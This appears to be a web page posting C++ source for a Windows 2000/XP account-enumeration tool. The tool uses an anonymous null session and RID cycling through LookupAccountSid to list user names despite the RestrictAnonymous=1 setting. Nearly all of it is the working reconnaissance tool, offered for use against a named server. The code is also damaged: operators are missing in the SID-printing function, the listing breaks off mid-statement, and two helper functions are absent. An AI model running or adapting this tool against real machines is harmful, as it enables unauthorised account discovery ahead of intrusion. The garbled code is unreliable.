突破“RestrictAnonymous=1”限制枚举帐号的代码


////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(pro\server\adv)
//
//
// Created by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include <stdio.h>
#include <string.h>
#include <iostream.h>
#include <windows.h>
#include <Lm.h>

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

// Prints the SID of an account (identifier authority and sub-authorities) and its
// SID_NAME_USE type; defined further down in this file.
void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse);
// Opens a connection to the remote resource described by lpNet (the IPC$ share in
// this program) with the given user name and password; returns 0 on success,
// non-zero otherwise.  Defined outside this listing.
int MyConnectServer(LPNETRESOURCE lpNet, LPCTSTR lpPassword, LPCTSTR lpUserName,
                    DWORD dwFlags, LPTSTR lpRemoteName);
// Closes the connection opened by MyConnectServer; returns 0 on success.
// Defined outside this listing.
int MyDisConnectServer(LPCTSTR lpRemoteName, DWORD dwFlags, BOOL bForce);

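enum
{
    ENUM_BUF_SIZE = 1024,   // byte size of the SID buffer / char size of name buffers
    ENUM_MAX_SUB_AUTH = 8   // AllocateAndInitializeSid accepts at most 8 sub-authorities
};

////////////////////////////////////////////////////////////////////////////////
// One RID-cycling pass.
//
// Rebuilds the SID of the reference account with its last sub-authority (the
// RID) replaced by dwFirstRid, dwFirstRid + 1, ... and asks lpServer to translate
// each candidate back to an account name (LookupAccountSid).  With
// RestrictAnonymous=1 the SAM enumeration APIs are refused to a null session but
// this SID-to-name translation still answers, which is the gap the program uses;
// disabling null-session access altogether (RestrictAnonymous=2 on Windows 2000)
// closes it.
//
// lpServer            server name as passed on the command line
// pSIA                identifier authority of the reference SID
// nSubAuthorityCount  number of sub-authorities in the reference SID (1..8)
// pSubAuthority       the reference SID's sub-authorities
// dwFirstRid, dwCount first RID to try and how many consecutive RIDs to try
// bStopOnError        TRUE: stop at the first RID the server cannot translate
//                     (the original's behaviour for the 500.. range);
//                     FALSE: silently skip untranslatable RIDs
//
// Returns the number of accounts found, or -1 on an unrecoverable error
// (out of memory, bad sub-authority count, AllocateAndInitializeSid failure).
////////////////////////////////////////////////////////////////////////////////
static int MyLookupRidRange(LPCTSTR lpServer, PSID_IDENTIFIER_AUTHORITY pSIA,
                            BYTE nSubAuthorityCount, const DWORD *pSubAuthority,
                            DWORD dwFirstRid, DWORD dwCount, BOOL bStopOnError)
{
    DWORD dwSub[ENUM_MAX_SUB_AUTH];
    DWORD i;
    int nFound = 0;
    int nRet = -1;
    LPTSTR lpUserName = NULL;
    LPTSTR lpDomainName = NULL;

    if (nSubAuthorityCount < 1 || nSubAuthorityCount > ENUM_MAX_SUB_AUTH)
    {
        printf ("Unexpected sub-authority count %u\n", (unsigned) nSubAuthorityCount);
        return -1;
    }
    // Unused trailing slots are still passed to AllocateAndInitializeSid, so zero them.
    for (i = 0; i < ENUM_MAX_SUB_AUTH; i++)
        dwSub[i] = (i < nSubAuthorityCount) ? pSubAuthority[i] : 0;

    lpUserName = (LPTSTR) LocalAlloc(LPTR, ENUM_BUF_SIZE * sizeof(TCHAR));
    lpDomainName = (LPTSTR) LocalAlloc(LPTR, ENUM_BUF_SIZE * sizeof(TCHAR));
    if (!lpUserName || !lpDomainName)
    {
        printf ("Out of memory!\n");
        goto Out;
    }

    for (i = 0; i < dwCount; i++)
    {
        PSID pNewSid = NULL;
        // Separate sizes: LookupAccountSid writes the required length of each
        // buffer back, so sharing one variable between them clobbers the first.
        DWORD cchUser = ENUM_BUF_SIZE;
        DWORD cchDomain = ENUM_BUF_SIZE;
        SID_NAME_USE eUse;

        dwSub[nSubAuthorityCount - 1] = dwFirstRid + i;
        if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
                                      dwSub[0], dwSub[1], dwSub[2], dwSub[3],
                                      dwSub[4], dwSub[5], dwSub[6], dwSub[7],
                                      &pNewSid))
        {
            printf ("Error SID!%lu\n", GetLastError());
            goto Out;
        }
        if (LookupAccountSid(lpServer, pNewSid, lpUserName, &cchUser,
                             lpDomainName, &cchDomain, &eUse))
        {
            printf ("UserName: %s\n", lpUserName);
            MyPrintSidInfo(pNewSid, &eUse);
            nFound++;
        }
        else if (bStopOnError)
        {
            printf ("Lookup error!%lu\n", GetLastError());
            FreeSid(pNewSid);
            break;
        }
        // Each candidate SID is released exactly once (the original freed the same
        // SID again at the top of the next loop and at exit).
        FreeSid(pNewSid);
    }
    nRet = nFound;

Out:
    LocalFree(lpUserName);     // LocalFree(NULL) is a no-op
    LocalFree(lpDomainName);
    return nRet;
}

////////////////////////////////////////////////////////////////////////////////
// Entry point.
//
// argv[1] is the remote name to connect to (also used as the system name for
// the account lookups).  Steps:
//   1. connect to the server with an empty user name / password (null session);
//   2. look up "guest", whose RID (501) exists on every installation, to learn
//      the machine/domain SID prefix;
//   3. rebuild that SID with RIDs 500..509 (built-in accounts, stop at the first
//      miss) and 1000..1099 (ordinary accounts) and print every name the server
//      translates;
//   4. release everything and disconnect.
//
// Returns 0 in all cases, as the original did; failures are reported on stdout.
////////////////////////////////////////////////////////////////////////////////
int main (int argc, char* argv[])
{
    int nRetCode;
    int nDisconnect;
    int nFound;
    DWORD cbSid;                 // byte size of pSid (not a character count)
    DWORD cchDomain;             // character size of lpDomainName
    DWORD i;
    BYTE nSubAuthorityCount;
    DWORD dwSubAuthority[ENUM_MAX_SUB_AUTH];
    char szIpc[50] = "";
    PSID pSid = NULL;
    LPTSTR lpDomainName = NULL;
    SID_NAME_USE eUse;
    PSID_IDENTIFIER_AUTHORITY pSIA;
    NETRESOURCE NET;

    // Argument check comes first: the original copied argv[1] before testing argc.
    if (argc < 2)
    {
        printf ("Usage: Enum <server>\n");
        return 0;
    }
    // Bounded copy into the fixed 50-byte buffer (the original used an unchecked sprintf).
    if (strlen(argv[1]) >= sizeof szIpc)
    {
        printf ("Server name too long!\n");
        return 0;
    }
    strcpy (szIpc, argv[1]);

    memset (&NET, 0, sizeof NET);
    NET.lpLocalName = NULL;
    NET.lpRemoteName = szIpc;
    NET.dwType = RESOURCETYPE_ANY;
    NET.lpProvider = NULL;

    printf ("Connecting %s...", szIpc);
    nRetCode = MyConnectServer(&NET, "", "", 0, szIpc);
    if (nRetCode)
    {
        printf ("Failed!\n");
        return 0;
    }
    printf ("Successfully!\n");

    cbSid = ENUM_BUF_SIZE;
    cchDomain = ENUM_BUF_SIZE;
    pSid = (PSID) LocalAlloc(LPTR, cbSid);
    lpDomainName = (LPTSTR) LocalAlloc(LPTR, cchDomain * sizeof(TCHAR));
    if (!pSid || !lpDomainName)
    {
        printf ("Out of memory!\n");
        goto End;
    }

    if (!LookupAccountName(argv[1], "guest", pSid, &cbSid, lpDomainName, &cchDomain, &eUse))
    {
        printf ("Lookup failed!%lu\n", GetLastError());
        goto End;
    }

    printf ("DomainName:%s\n", lpDomainName);
    pSIA = GetSidIdentifierAuthority(pSid);
    MyPrintSidInfo(pSid, &eUse);
    nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
    if (nSubAuthorityCount > ENUM_MAX_SUB_AUTH)
    {
        // Guard the fixed array; the original wrote past it for larger counts.
        printf ("Unexpected sub-authority count %u\n", (unsigned) nSubAuthorityCount);
        goto End;
    }
    for (i = 0; i < nSubAuthorityCount; i++)
    {
        dwSubAuthority[i] = *GetSidSubAuthority(pSid, i);
    }

    //lookup system account
    nFound = MyLookupRidRange(argv[1], pSIA, nSubAuthorityCount, dwSubAuthority,
                              500, 10, TRUE);
    if (nFound < 0)
        goto End;

    //look up user account
    MyLookupRidRange(argv[1], pSIA, nSubAuthorityCount, dwSubAuthority,
                     1000, 100, FALSE);

End:
    // pSid came from LocalAlloc, so LocalFree is the matching release (the
    // original passed it to FreeSid).  LocalFree(NULL) is a no-op.
    LocalFree(pSid);
    LocalFree(lpDomainName);
    Sleep (100);
    printf ("Disconnecting server...");
    nDisconnect = MyDisConnectServer(szIpc, CONNECT_UPDATE_PROFILE, TRUE);
    if (nDisconnect)
        printf ("Failed!%d\n", nDisconnect);   // report the disconnect result, not the stale connect code
    else
        printf ("Successfully!\n");
    return 0;
}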

void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
int i;
int nSubAuthorityCount;
PSID_IDENTIFIER_AUTHORITY pSIA;

pSIA = GetSidIdentifierAuthority(pSid);
printf ("\tSID:");
if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0)
{
ULONG ulSIA = (ULONG)(pSIA->Value[5] )
(ULONG)(pSIA->Value[4] << 8)
(ULONG)(pSIA->Value[3] << 16)
(ULONG)(pSIA->Value[2] << 24);
printf ("S-1-%d",ulSIA);
}
else
cout << hex << (USHORT)pSIA->Value[0]
<< (USHORT)pSIA->Value[1]
<< (USHORT)pSIA->Value[2]
<< (USHORT)pSIA->Value[3]
